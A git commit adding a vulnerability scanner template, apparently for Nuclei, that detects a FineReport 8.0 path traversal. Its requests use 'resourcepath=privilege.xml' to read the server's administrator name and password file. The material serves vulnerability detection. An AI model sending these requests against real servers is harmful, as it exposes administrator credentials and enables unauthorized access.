Create finereport-path-traversal.yaml

2021-02-20 23:36:48 +07:00 · 2021-02-20 23:36:48 +07:00 · 6ace5ab376
parent c476d079d1
commit 6ace5ab376
1 changed files with 26 additions and 0 deletions
--- a/vulnerabilities/other/finereport-path-traversal.yaml
+++ b/vulnerabilities/other/finereport-path-traversal.yaml
@ -0,0 +1,26 @@
+id: finereport-path-traversal
+
+info:
+  name: Finereport 8.0 Path Traversal
+  author: pikpikcu
+  severity: medium
+  refrence: http://foreversong.cn/archives/1378
+  tags: finereport,lfi
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
+      - "{{BaseURL}}/report/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "<rootManagerName>"
+          - "<rootManagerPassword>"
+        part: body
+
+      - type: status
+        status:
+          - 200